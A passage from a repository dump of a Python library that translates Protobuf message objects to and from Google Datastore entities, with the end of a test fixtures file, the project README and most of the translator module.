30\nEXAMPLE_PB_POPULATED.string_array_key.append(u'item1')\nEXAMPLE_PB_POPULATED.string_array_key.append(u'item2')\nEXAMPLE_PB_POPULATED.enum_key = example_pb2.ExampleEnumModel.ENUM1\nEXAMPLE_PB_POPULATED.int32_array_key.append(100)\nEXAMPLE_PB_POPULATED.int32_array_key.append(200)\nEXAMPLE_PB_POPULATED.int32_array_key.append(300)\nEXAMPLE_PB_POPULATED.bytes_array_key.append(b'a')\nEXAMPLE_PB_POPULATED.bytes_array_key.append(b'b')\nEXAMPLE_PB_POPULATED.bytes_array_key.append(b'c')\nEXAMPLE_PB_POPULATED.struct_array_key.append(struct1_pb)\nEXAMPLE_PB_POPULATED.struct_array_key.append(struct2_pb)\n\nexample_placeholder_pb1 = example_pb2.ExampleNestedModel(string_key=u'value 1',\n int32_key=12345, enum_key=example_pb2.ExampleEnumModel.ENUM2)\nexample_placeholder_pb2 = example_pb2.ExampleNestedModel(string_key=u'value 2',\n int32_key=5000, enum_key=example_pb2.ExampleEnumModel.ENUM0)\nexample_placeholder_pb3 = example_pb2.ExampleNestedModel(string_key=u'value 3',\n int32_key=40, 
enum_key=example_pb2.ExampleEnumModel.ENUM0)\n\nEXAMPLE_PB_POPULATED.complex_array_key.append(example_placeholder_pb1)\nEXAMPLE_PB_POPULATED.complex_array_key.append(example_placeholder_pb2)\nEXAMPLE_PB_POPULATED.complex_array_key.append(example_placeholder_pb3)\n\nEXAMPLE_PB_POPULATED.timestamp_key.FromDatetime(dt)\nEXAMPLE_PB_POPULATED.struct_key.update({\n 'key1': u'val1',\n 'key2': 2,\n 'key3': [1, 2, 3, 4.44, None, True, False],\n 'key4': u'čđć',\n 'key5': {\n 'dict_key_1': u'1',\n 'dict_key_2': 30,\n 'dict_key_3': [u'a', u'b', u'c', 7, {u'h': u'bar', u'g': [1, 2, 33.33], u'j': [],\n u'l': True, u'm': False}, None],\n 'dict_key_4': None,\n 'dict_key_5': 55.55\n },\n 'key6': None,\n 'key7': [],\n 'key8': {\n 'a': {\n 'b': {\n 'c': []\n }\n }\n },\n 'key9': True,\n 'key10': False,\n 'key11': 11.123\n})\n\ngeo_point_value = latlng_pb2.LatLng(latitude=-20.2, longitude=+160.5)\nEXAMPLE_PB_POPULATED.geo_point_key.CopyFrom(geo_point_value)\n\n# Ezample object which explicitly provides values for all the fields which are the same as\n# the default values\nEXAMPLE_PB_DEFAULT_VALUES = example_pb2.ExampleDBModel()\nEXAMPLE_PB_DEFAULT_VALUES.bool_key = False\nEXAMPLE_PB_DEFAULT_VALUES.string_key = ''\nEXAMPLE_PB_DEFAULT_VALUES.int32_key = 0\nEXAMPLE_PB_DEFAULT_VALUES.int64_key = 0\nEXAMPLE_PB_DEFAULT_VALUES.double_key = 0.0\nEXAMPLE_PB_DEFAULT_VALUES.float_key = 0.0\nEXAMPLE_PB_DEFAULT_VALUES.enum_key = example_pb2.ExampleEnumModel.ENUM0\nEXAMPLE_PB_DEFAULT_VALUES.bool_key = False\nEXAMPLE_PB_DEFAULT_VALUES.bytes_key = b''\nEXAMPLE_PB_DEFAULT_VALUES.null_key = 0\nEXAMPLE_PB_DEFAULT_VALUES.struct_key.update({})\n# pylint: enable=no-member\n\nEXAMPLE_PB_WITH_OPTIONS_1 = example_with_options_pb2.ExampleDBModelWithOptions1()\nEXAMPLE_PB_WITH_OPTIONS_1.string_key_one = 'one'\nEXAMPLE_PB_WITH_OPTIONS_1.string_key_two = 'two'\nEXAMPLE_PB_WITH_OPTIONS_1.string_key_three = 'three'\nEXAMPLE_PB_WITH_OPTIONS_1.string_key_four = 'four'\nEXAMPLE_PB_WITH_OPTIONS_1.int32_field_one = 100000000\nEXAMPLE_PB_WITH_OPTIONS_1.int32_field_two = 200000000\n\n\nclass EmulatorCreds(google.auth.credentials.Credentials):\n \"\"\"\n Mock credential class to be used with the Python Datastore client.\n \"\"\"\n\n def __init__(self):\n self.token = b'secret'\n self.expiry = None\n\n @property\n def valid(self):\n return True\n\n def refresh(self, _):\n pass\n" }, { "alpha_fraction": 0.7610158920288086, "alphanum_fraction": 0.7713651061058044, "avg_line_length": 37.69778823852539, "blob_id": "f3d56427f074c50974987d86cf9353d1b5120908", "content_id": "325a776e96d3da652bfc3cc6db4161b0fdec80f7", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 15750, "license_type": "permissive", "max_line_length": 916, "num_lines": 407, "path": "/README.md", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# Protobuf Message to Google Datastore Entity Protobuf Message Translator\n\n[![Tests Build Status](https://travis-ci.org/Kami/python-protobuf-cloud-datastore-entity-translator.svg?branch=master)](https://travis-ci.org/Kami/python-protobuf-cloud-datastore-entity-translator) [![Codecov](https://codecov.io/github/Kami/python-protobuf-cloud-datastore-entity-translator/badge.svg?branch=master&service=github)](https://codecov.io/github/Kami/python-protobuf-cloud-datastore-entity-translator?branch=master) 
[![](https://img.shields.io/pypi/v/protobuf-cloud-datastore-translator.svg)](https://pypi.org/project/protobuf-cloud-datastore-translator/) [![](https://img.shields.io/pypi/pyversions/protobuf-cloud-datastore-translator.svg)](https://pypi.org/project/protobuf-cloud-datastore-translator/) [![](https://img.shields.io/github/license/Kami/python-protobuf-cloud-datastore-entity-translator.svg)](https://github.com/Kami/python-protobuf-cloud-datastore-entity-translator/blob/master/LICENSE)\n\nThis library allows you to store arbitrary Protobuf message objects inside the Google Datastore.\n\nIt exposes methods for translating arbitrary Protobuf message objects to Entity Protobuf objects\nwhich are used by Google Datastore and vice-versa.\n\nIt supports all the native types which are supported by the Google Datastore.\n\n## Why, Motivation\n\nIf you are working with Google Datastore from a single programming language, you can utilize\none of the multiple Datastore ORMs for that programming language. Those ORMs allow you to define\na schema for your database models and work with them using native programming language types.\n\nThis approach breaks down when you want to work with the same set of datastore entities from\nmultiple programming languages.\n\nThere are multiple solutions for that problem, but one approach is to define some kind of model\nschema which is programming language agnostic.\n\nAnd this library tries to do just that. It utilizes native protobuf message definitions as a schema\nfor database models. This way those definitions can be shared by multiple programming languages and\neach language just needs a light translator library (like this one) which knows how to translate\narbitrary Protobuf objects into Entity Protobuf objects and vice-versa.\n\n## Features\n\nRight now the library supports the following Protobuf field types and functionality:\n\n* All the simple types (string, int32, int64, double, float, bytes, bool, enum)\n* Scalar / container types (map, repeated)\n* Complex types from Protobuf standard library (``google.protobuf.Timestamp``,\n ``google.protobuf.Struct``, ``google.types.LatLng``)\n* Using imports and referencing types from different Protobuf definition files. 
For example,\n you can have a Protobuf message definition called ``Model1DB`` inside file ``model1.proto`` which\n has a field which references ``Model2DB`` from ``model2.proto`` file.\n\n For that to work, you need to make sure that the root directory which contains all the generated\n Protobuf Python files is available in ``PYTHONPATH``.\n\n For example, if generated files are written to ``my_app/generated/``, ``my_app/generated/`` needs\n to be in ``PYTHONPATH`` and this directory needs to be a Python package (it needs to contain\n an ``__init__.py`` file).\n\nFor more information on the actual types supported by Google Datastore, refer to\nhttps://cloud.google.com/datastore/docs/concepts/entities#properties_and_value_types.\n\n## Supported Python versions\n\n* Python 2.7\n* Python 3.6\n* Python 3.7\n\nIt may also work with Python 3.4 and 3.5, but we don't test against those versions.\n\n## Usage\n\nThis library exposes three main public methods.\n\n### ``model_pb_to_entity_pb(model_pb, exclude_falsy_values=False, exclude_from_index=None)``\n\nThis method converts arbitrary Protobuf message objects to the Entity Protobuf object which can\nbe used with Google Datastore.\n\nFor example:\n\n```python\nfrom google.cloud import datastore\nfrom google.protobuf.timestamp_pb2 import Timestamp\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\n\nfrom generated.protobuf.models import my_model_pb2\n\n# 1. Store your database model object which is represented using a custom Protobuf message class\n# instance inside Google Datastore\n\n# Create database model Protobuf instance\nmodel_pb = my_model_pb2.MyModelDB()\n# Other entity attributes\nmodel_pb.key1 = 'value1'\nmodel_pb.key2 = 200\nmodel_pb.parameters['foo'] = 'bar'\nmodel_pb.parameters['bar'] = 'baz'\n\nstart_time_timestamp = Timestamp()\nstart_time_timestamp.GetCurrentTime()\n\n# Timestamp is a message field so it needs to be set using CopyFrom()\nmodel_pb.start_time.CopyFrom(start_time_timestamp)\n\n# Convert it to Entity Protobuf object which can be used with Google Datastore\nentity_pb = model_pb_to_entity_pb(model_pb)\n\n# Store it in the datastore\nclient = datastore.Client(...)\nkey = client.key('MyModelDB', 'some_primary_key')\nentity_pb.key.CopyFrom(key.to_protobuf())\nentity = datastore.helpers.entity_from_protobuf(entity_pb)\nclient.put(entity)\n```\n\n### ``model_pb_with_key_to_entity_pb(client, model_pb, exclude_falsy_values=False, exclude_from_index=None)``\n\nAs a convenience, this library also exposes the ``model_pb_with_key_to_entity_pb`` method. This method assumes\nthere is a special ``key`` string field on your Protobuf message which will act as an Entity\nprimary key.\n\nUnderneath, this method infers ``project_id`` and ``namespace_id`` parts of the Entity composite\nprimary key from the ``client`` object which is passed to this method. Entity ``kind`` is inferred\nfrom the Protobuf message model name. 
For example, if the Protobuf message model name is\n``UserInfoDB``, entity kind would be set to ``UserInfoDB``.\n\nFor example:\n\n```python\nfrom google.cloud import datastore\n\nfrom protobuf_cloud_datastore_translator import model_pb_with_key_to_entity_pb\n\nmodel_pb = my_model_pb2.MyModelDB()\nmodel_pb.key = 'key-1234'\n# set model fields\n# ...\n\nclient = datastore.Client(project='my-project', namespace='my-namespace')\n\nentity_pb = model_pb_with_key_to_entity_pb(client, model_pb)\n\n# Store it in the datastore\nentity = datastore.helpers.entity_from_protobuf(entity_pb)\nclient.put(entity)\n\n# In this scenario, the actual key would look the same as if you manually constructed it like this:\nkey = client.key('MyModelDB', 'key-1234', project='my-project', namespace='my-namespace')\n```\n\n### ``entity_pb_to_model_pb(model_pb_class, entity_pb, strict=False)``\n\nThis method converts a raw Entity Protobuf object as returned by the Google Datastore to the provided\nProtobuf message class.\n\nBy default, fields which are found on the Datastore Entity Protobuf object, but not on the\nProtobuf message class are ignored. If you want an exception to be thrown in such a scenario, you\ncan pass the ``strict=True`` argument to the method.\n\nFor example:\n\n```python\nkey = client.key('MyModelDB', 'some_primary_key')\nentity = client.get(key)\nentity_pb = datastore.helpers.entity_to_protobuf(entity)\n\nmodel_pb = entity_pb_to_model_pb(my_model_pb2.MyModelPB, entity_pb)\nprint(model_pb)\n```\n\n## Excluding Protobuf Model Fields from Indexes\n\nBy default, Google Cloud Datastore automatically indexes each entity (model) property.\n\nIndexing each field (entity property) is usually not desired nor needed. It also has some\nlimitations (for example, the size of a simple field which is to be indexed is limited to ``1500``\nbytes, etc.). In addition to that, unnecessary indexing causes increased storage space consumption.\n\nThis library allows you to define which model fields to exclude from the index on a per-field basis\nutilizing a Protobuf field options extension.\n\nFor example:\n\n```protobuf\nsyntax = \"proto3\";\n\nimport \"google/protobuf/descriptor.proto\";\n\n// Custom Protobuf option which specifies which model fields should be excluded\n// from index\n// NOTE: Keep in mind that it's important not to change the option name\n// (\"exclude_from_index\") since this library uses that special option name to\n// determine if a field should be excluded from index.\nextend google.protobuf.FieldOptions {\n bool exclude_from_index = 50000;\n}\n\nmessage ExampleDBModelWithOptions1 {\n string string_key_one = 1 [(exclude_from_index) = true];\n string string_key_two = 2;\n string string_key_three = 3 [(exclude_from_index) = true];\n string string_key_four = 4;\n int32 int32_field_one = 5;\n int32 int32_field_two = 6 [(exclude_from_index) = true];\n}\n```\n\nIn this example, fields ``string_key_one``, ``string_key_three`` and ``int32_field_two`` won't be\nindexed (https://cloud.google.com/datastore/docs/concepts/indexes#unindexed_properties).\n\nIn this example, the field option extension is defined in the same file where the model is defined, but in\nreality you will likely define that extension inside a custom protobuf file (e.g.\n``field_options.proto``) and include that file inside other files which contain your database model\ndefinitions.\n\nKeep in mind that if you define the option extension inside a package, that package needs to match the\npackage under which the models are stored.\n\nFor example:\n\n1. 
``protobuf/models/field_options.proto``:\n\n```protobuf\nsyntax = \"proto3\";\n\npackage models;\n\nimport \"google/protobuf/descriptor.proto\";\n\n// Custom Protobuf option which specifies which model fields should be excluded\n// from index\n// NOTE: Keep in mind that it's important not to change the option name\n// (\"exclude_from_index\") since this library uses that special option name to\n// determine if a field should be excluded from index.\nextend google.protobuf.FieldOptions {\n bool exclude_from_index = 50000;\n}\n```\n\n2. ``protobuf/models/my_model.proto``:\n\n```protobuf\nsyntax = \"proto3\";\n\npackage models;\n\nimport \"models/field_options.proto\";\n\nmessage ExampleDBModelWithOptions1 {\n string string_key_one = 1 [(exclude_from_index) = true];\n string string_key_two = 2;\n string string_key_three = 3 [(exclude_from_index) = true];\n string string_key_four = 4;\n int32 int32_field_one = 5;\n int32 int32_field_two = 6 [(exclude_from_index) = true];\n}\n```\n\n## Examples\n\nFor example Protobuf message definitions, see ``protobuf/`` directory.\n\nExample usage:\n\n```python\nfrom google.cloud import datastore\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\n\nfrom generated.protobuf.models import my_model_pb2\n\n# 1. Store your database model object which is represented using a custom Protobuf message class\n# instance inside Google Datastore\n\n# Create database model Protobuf instance\nmodel_pb = my_model_pb2.MyModelDB()\nmodel_pb.key1 = 'value1'\nmodel_pb.key2 = 200\n\n# Convert it to Entity Protobuf object which can be used with Google Datastore\nentity_pb = model_pb_to_entity_pb(model_pb)\n\n# Store it in the datastore\n# To avoid conversion back and forth you can also use lower level client methods which\n# work directly with the Entity Protobuf objects\n# For information on the low level client usage, see\n# https://github.com/GoogleCloudPlatform/google-cloud-datastore/blob/master/python/demos/trivial/adams.py#L66\nclient = Client(...)\nkey = self.client.key('MyModelDB', 'some_primary_key')\nentity_pb_translated.key.CopyFrom(key.to_protobuf())\n\nentity = datastore.helpers.entity_from_protobuf(entity_pb)\nclient.put(entity)\n\n# 2. Retrieve entity from the datastore and convert it to your Protobuf DB model instance class\n# Same here - you can also use low level client to retrieve Entity protobuf object directly and\n# avoid unnecessary conversion round trip\nkey = client.key('MyModelDB', 'some_primary_key')\nentity = client.get(key)\nentity_pb = datastore.helpers.entity_to_protobuf(entity)\n\nmodel_pb = entity_pb_to_model_pb(my_model_pb2.MyModelPB, entity_pb)\nprint(model_pb)\n```\n\n\n## Gotchas\n\n### Default values\n\nIn Protobuf syntax version 3 a concept of field being set has been removed and combined with a\nconcept of a default value. 
This means that even when a field is not set, a default value which\nis specific to that field type will be returned.\n\nAs far as this library is concerned, this means when you are converting / translating Protobuf\nobject with no values set, translated object will still contain default values for fields which\nare not set.\n\nFor example, the output / end result of both those two calls will be the same:\n\n```python\n# Field values are explicitly provided, but they match default values\nexample_pb = example_pb2.ExampleDBModel()\nexample_pb.bool_key = False\nexample_pb.string_key = ''\nexample_pb.int32_key = 0\nexample_pb.int64_key = 0\nexample_pb.double_key = 0.0\nexample_pb.float_key = 0.0\nexample_pb.enum_key = example_pb2.ExampleEnumModel.ENUM0\nexample_pb.bool_key = False\nexample_pb.bytes_key = b''\nexample_pb.null_key = 1\n\nentity_pb_translated = model_pb_to_entity_pb(example_pb)\nprint(entity_pb_translated)\n\n# No field values are provided, implicit default values are used during serialization\nexample_pb = example_pb2.ExampleDBModel()\nentity_pb_translated = model_pb_to_entity_pb(example_pb)\nprint(entity_pb_translated)\n```\n\nIf you don't want default values to be set on the translated Entity Protobuf objects and stored\ninside the datastore, you can pass ``exclude_falsy_values=True`` argument to the\n``model_pb_to_entity_pb`` method.\n\nFor details, see:\n\n* https://developers.google.com/protocol-buffers/docs/reference/python-generated\n* https://github.com/protocolbuffers/protobuf/issues/1606\n* https://github.com/googleapis/google-cloud-python/issues/1402\n* https://github.com/googleapis/google-cloud-python/pull/1450\n* https://github.com/googleapis/google-cloud-python/pull/1329\n\n### Struct Field type\n\nThis library supports ``google.protobuf.Struct`` field type out of the box. Struct field values\nare serialized as an embedded entity.\n\nKeep in mind that ``google.protobuf.Struct`` field type mimics JSON type which only supports\n``number`` type for numeric values (https://github.com/protocolbuffers/protobuf/blob/master/src/google/protobuf/struct.proto#L62).\nThis means all the numbers (including integers) are represented as double precision floating\npoint values (internally on the Entity, that's stored as ``value_pb.double_value``).\n\n## Translator Libraries for Other Programming Languages\n\nThis section contains a list of translator libraries for other programming languages which offer\nthe same functionality.\n\n* Golang - [go-protobuf-cloud-datastore-entity-translator](https://github.com/Sheshagiri/go-protobuf-cloud-datastore-entity-translator)\n\n## Tests\n\nUnit and integration tests can be found inside ``tests/`` directory.\n\nYou can run unit and integration tests and other lint checks by using tox.\n\n```bash\n# Run all tox targets\ntox\n\n# Run only lint checks\ntox -e lint\n\n# Run unit tests under Python 2.7\ntox -e py2.7-unit-tests\n\n# Run Integration tests under Python 3.7\ntox -e py3.7-integration-tests\n\n# Run unit and integration tests and generate and display code coverage report\ntox -e coverage\n```\n\nNOTE 1: Integration tests depend on the Google Cloud Datastore Emulator to be running\n(``./scripts/run-datastore-emulator.sh``).\n\nNOTE 2: Integration tests also run cross programming language compatibility tests which\nverify that the Python and Go translator libraries produce exactly the same output. 
As such,\nthose tests also require Golang >= 1.12 to be installed on the system.\n\n## License\n\nCopyright 2019 Tomaz Muraus\n\nCopyright 2019 Extreme Networks, Inc\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use this work except\nin compliance with the License. You may obtain a copy of the License in the [LICENSE](LICENSE) file,\nor at:\n\n[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)\n\nBy contributing you agree that these contributions are your own (or approved by your employer) and\nyou grant a full, complete, irrevocable copyright license to all users and developers of the\nproject, present and future, pursuant to the license of the project.\n" }, { "alpha_fraction": 0.6151993870735168, "alphanum_fraction": 0.6175258159637451, "avg_line_length": 42.90860366821289, "blob_id": "15ab6cc0d7852edd34f65a60b3dc8bbe04c8c700", "content_id": "624f4b60cf4310e1818aac1fd5e6e83a4093be99", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24501, "license_type": "permissive", "max_line_length": 100, "num_lines": 558, "path": "/protobuf_cloud_datastore_translator/translator.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nimport importlib\n\nfrom typing import Any\nfrom typing import Type\nfrom typing import cast\nfrom typing import Optional\nfrom typing import Union\nfrom typing import List\nfrom typing import TypeVar\nfrom types import ModuleType\nfrom datetime import datetime\n\nimport six\n\nfrom google.type import latlng_pb2\nfrom google.cloud import datastore\nfrom google.cloud.datastore_v1.proto import entity_pb2\nfrom google.cloud.datastore.helpers import GeoPoint\nfrom google.cloud.datastore_v1.types import Value\nfrom google.protobuf import message\nfrom google.protobuf import timestamp_pb2\nfrom google.protobuf import struct_pb2\nfrom google.protobuf import descriptor\nfrom google.protobuf.internal.well_known_types import _GetStructValue # type: ignore\nfrom google.protobuf.pyext.cpp_message import GeneratedProtocolMessageType # NOQA\n\nfrom google.protobuf.descriptor import FieldDescriptor\nfrom google.protobuf.pyext._message import MessageMapContainer\nfrom google.protobuf.pyext._message import ScalarMapContainer\nfrom google.protobuf.pyext._message import RepeatedScalarContainer\nfrom google.protobuf.pyext._message import RepeatedCompositeContainer\n\n__all__ = [\n 'model_pb_to_entity_pb',\n 'model_pb_with_key_to_entity_pb',\n 'entity_pb_to_model_pb'\n]\n\n# Type which represents an arbitrary ModelPB class which is a subclass of message.Message\nT_model_pb = TypeVar('T_model_pb', bound=message.Message)\n\nU_model_class_or_instance = Union[message.Message, Type[GeneratedProtocolMessageType]]\n\n# String name for 
exclude from index extension which signals this library which model\n# fields should be excluded from index\nEXCLUDE_FROM_INDEX_EXT_NAME = 'exclude_from_index'\n\n\ndef model_pb_with_key_to_entity_pb(client, model_pb, exclude_falsy_values=False,\n exclude_from_index=None):\n # type: (datastore.Client, message.Message, bool, Optional[List[str]]) -> entity_pb2.Entity\n \"\"\"\n Same as \"model_pb_to_entity_pb\", but it assumes model_pb which is passed to this function also\n contains \"key\" string field which is used to construct a primary key for the Entity PB object.\n\n NOTE: Datastore client instance needs to be passed to this method so\n namespace and project can be inferred from it (namespace_id and project_id are used as part of\n a composite primary key).\n \"\"\"\n entity_pb = model_pb_to_entity_pb(model_pb=model_pb, exclude_falsy_values=exclude_falsy_values,\n exclude_from_index=exclude_from_index)\n\n if getattr(model_pb, 'key', None) is not None:\n # Special handling for top level key attribute which we assume will service as a primary\n # key (if provided)\n # NOTE: We use model name as the value for \"kind\" part of the key. Aka if Protobuf\n # message name is \"MyClassDBModel\", kind will be set to \"MyClassDBModel\"\n model_name = model_pb.DESCRIPTOR.name\n\n key_str = model_pb.key # type: ignore\n key_pb = client.key(model_name, key_str).to_protobuf()\n entity_pb.key.CopyFrom(key_pb) # pylint: disable=no-member\n\n return entity_pb\n\n\ndef model_pb_to_entity_pb(model_pb, exclude_falsy_values=False, exclude_from_index=None):\n # type: (message.Message, bool, Optional[List[str]]) -> entity_pb2.Entity\n \"\"\"\n Translate Protobuf based database model object to Entity object which can be used with Google\n Datastore client library.\n\n :param model_pb: Instance of a custom Protobuf object to translate.\n\n :param exclude_falsy_values: True to exclude field values which are falsy (e.g. None, False,\n '', 0, etc.) and match the default values.\n\n NOTE: Due to the design of protobuf v3, there is no way to\n distinguish between a user explicitly providing a value which is\n the same as a default value (e.g. 0 for an integer field) and\n user not providing a value and default value being used instead.\n\n :param exclude_from_index: Optional list of field names which should not be indexed. 
By\n default, all the simple fields are indexed.\n\n NOTE: If provided, this value has high precedence over\n \"exclude_from_index\" message option defined on the model.\n \"\"\"\n exclude_from_index = exclude_from_index or []\n\n if not isinstance(model_pb, message.Message):\n raise ValueError('model_pb argument is not a valid Protobuf class instance')\n\n fields = list(iter(model_pb.DESCRIPTOR.fields))\n fields = [field for field in fields if field not in ['key']]\n\n entity_pb = entity_pb2.Entity()\n\n exclude_from_index = cast(list, exclude_from_index)\n\n for field_descriptor in fields:\n field_type = field_descriptor.type\n field_name = field_descriptor.name\n field_value = getattr(model_pb, field_name, None)\n\n if field_value is None:\n # Value not set or it uses a default value, skip it\n # NOTE: proto3 syntax doesn't support HasField() anymore so there is now way for us to\n # determine if a value is set / provided so we just use and return default values.\n continue\n\n if exclude_falsy_values and not field_value:\n continue\n\n attr_type = get_pb_attr_type(field_value)\n\n value_pb = None\n if attr_type == 'array_value':\n if len(field_value) == 0:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n array_value = entity_pb2.ArrayValue(values=[])\n value_pb.array_value.CopyFrom(array_value)\n else:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n\n for value in field_value:\n if field_type == descriptor.FieldDescriptor.TYPE_MESSAGE:\n # Nested message type\n entity_pb_item = model_pb_to_entity_pb(value)\n value_pb_item = entity_pb2.Value()\n\n # pylint: disable=no-member\n value_pb_item.entity_value.CopyFrom(entity_pb_item)\n # pylint: enable=no-member\n else:\n # Simple type\n value_pb_item = entity_pb2.Value()\n value_pb_item = set_value_pb_item_value(value_pb=value_pb_item, value=value)\n\n value_pb.array_value.values.append(value_pb_item)\n elif field_type == descriptor.FieldDescriptor.TYPE_STRING:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.string_value = field_value\n elif field_type in [descriptor.FieldDescriptor.TYPE_DOUBLE,\n descriptor.FieldDescriptor.TYPE_FLOAT]:\n # NOTE: Datastore only supports double type so we map float to double\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.double_value = field_value\n elif field_type in [descriptor.FieldDescriptor.TYPE_INT32,\n descriptor.FieldDescriptor.TYPE_INT64]:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.integer_value = field_value\n elif field_type == descriptor.FieldDescriptor.TYPE_ENUM:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n\n if field_descriptor.enum_type.name == 'NullValue':\n # NULL value\n value_pb.null_value = struct_pb2.NULL_VALUE\n else:\n # Regular ENUM\n value_pb.integer_value = field_value\n elif field_type == descriptor.FieldDescriptor.TYPE_BOOL:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.boolean_value = field_value\n elif field_type == descriptor.FieldDescriptor.TYPE_BYTES:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n\n if isinstance(field_value, six.string_types):\n field_value = field_value.encode('utf-8')\n\n value_pb.blob_value = field_value\n elif field_type == descriptor.FieldDescriptor.TYPE_MESSAGE:\n # Complex type, convert to entity\n field_type = model_pb.DESCRIPTOR.fields_by_name[field_name]\n\n if field_type.message_type.full_name == 'google.protobuf.Timestamp':\n if 
str(field_value) == '':\n # Value not set\n # TODO: Include default empty value?\n # value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n # value_pb.timestamp_value.CopyFrom(field_value)\n continue\n\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.timestamp_value.CopyFrom(field_value)\n elif field_type.message_type.full_name == 'google.type.LatLng':\n if str(field_value) == '':\n # Value not set\n continue\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.geo_point_value.CopyFrom(field_value)\n elif isinstance(field_value, MessageMapContainer):\n # Nested dictionary on a struct, set a value directory on a passed in pb object\n # which is a parent Struct entity\n entity_pb_item = get_entity_pb_for_value(value=field_value)\n entity_pb.CopyFrom(entity_pb_item)\n elif isinstance(field_value, ScalarMapContainer):\n # Custom user defined type, recurse into it\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n entity_pb_item = get_entity_pb_for_value(value=field_value)\n value_pb.entity_value.CopyFrom(entity_pb_item)\n elif field_type.message_type.full_name == 'google.protobuf.Struct':\n if not dict(field_value):\n # Value not set, skip it\n continue\n\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n entity_pb_item = get_entity_pb_for_value(value=field_value)\n value_pb.entity_value.CopyFrom(entity_pb_item)\n else:\n # Nested type, potentially referenced from another Protobuf definition file\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n entity_pb_item = model_pb_to_entity_pb(field_value)\n value_pb.entity_value.CopyFrom(entity_pb_item)\n else:\n raise ValueError('Unsupported field type for field \"%s\"' % (field_name))\n\n if not value_pb:\n continue\n\n value_pb = cast(Value, value_pb)\n\n # Determine if field should be excluded from index\n exclude_field_from_indexes = exclude_field_from_index(model=model_pb,\n field_descriptor=field_descriptor,\n exclude_from_index=exclude_from_index)\n\n if exclude_field_from_indexes:\n # Field should be excluded from the index, mark that on the Entity Value\n value_pb.exclude_from_indexes = True\n\n return entity_pb\n\n\ndef entity_pb_to_model_pb(model_pb_class, # type: Type[T_model_pb]\n entity_pb, # type: entity_pb2.Entity\n strict=False # type: bool\n ):\n # type: (...) 
-> T_model_pb\n \"\"\"\n Translate Google Datastore Entity Protobuf object to Protobuf based database model object.\n\n :param model_pb_class: Protobuf class to convert the Entity object to.\n :param entity_pb: Entity Protobuf instance to convert to database model instance.\n :param strict: True to run in a strict mode and throw an exception if we encounter a field on\n the database object which is not defined on the model definition.\n \"\"\"\n model_pb_field_names = list(iter(model_pb_class.DESCRIPTOR.fields))\n model_pb_field_names = [field.name for field in model_pb_field_names if field not in ['key']]\n\n model_pb = model_pb_class()\n\n for prop_name, value_pb in datastore.helpers._property_tuples(entity_pb):\n value = datastore.helpers._get_value_from_value_pb(value_pb)\n\n # Field not defined on the model class\n if prop_name not in model_pb_field_names:\n if strict:\n msg = ('Database object contains field \"%s\" which is not defined on the database '\n 'model class \"%s\"' % (prop_name, model_pb.DESCRIPTOR.name))\n raise ValueError(msg)\n else:\n continue\n\n def set_model_pb_value(model_pb, prop_name, value, is_nested=False):\n model_pb_class = model_pb.__class__\n\n if isinstance(value, list):\n for item in value:\n if isinstance(item, dict):\n # Handle nested models\n if model_pb_class.DESCRIPTOR.fields_by_name[prop_name].message_type:\n field = model_pb_class.DESCRIPTOR.fields_by_name[prop_name]\n\n # Dynamically import nested model from a corresponding file\n nested_model_name = field.message_type.name\n nested_model_module = get_python_module_for_field(field=field)\n nested_model_class = getattr(nested_model_module, nested_model_name)\n\n # Instantiate an instance of nested field Protobuf class\n item_pb = nested_model_class()\n set_model_pb_value(item_pb, prop_name, item, is_nested=True)\n\n getattr(model_pb, prop_name).append(item_pb)\n elif isinstance(model_pb, struct_pb2.Struct):\n try:\n model_pb[prop_name]\n except ValueError:\n model_pb.update({prop_name: []})\n\n model_pb[prop_name].append(item)\n else:\n getattr(model_pb, prop_name).append(item)\n elif isinstance(value, dict):\n # We assume it's a referenced protobuf type if it doesn't contain \"update()\" method\n # google.protobuf.Struct and Map types contain \"update()\" methods so we can treat\n # them as simple dictionaries\n if is_nested:\n for key, value in six.iteritems(value):\n set_model_pb_value(model_pb, key, value)\n elif isinstance(model_pb, struct_pb2.Struct):\n model_pb.update({prop_name: value})\n else:\n field = model_pb_class.DESCRIPTOR.fields_by_name[prop_name]\n is_nested_model_type = (bool(field.message_type) and\n not hasattr(getattr(model_pb, prop_name, {}), 'update'))\n\n if is_nested_model_type:\n # Custom type definition potentially defined in different file\n field = model_pb_class.DESCRIPTOR.fields_by_name[prop_name]\n\n 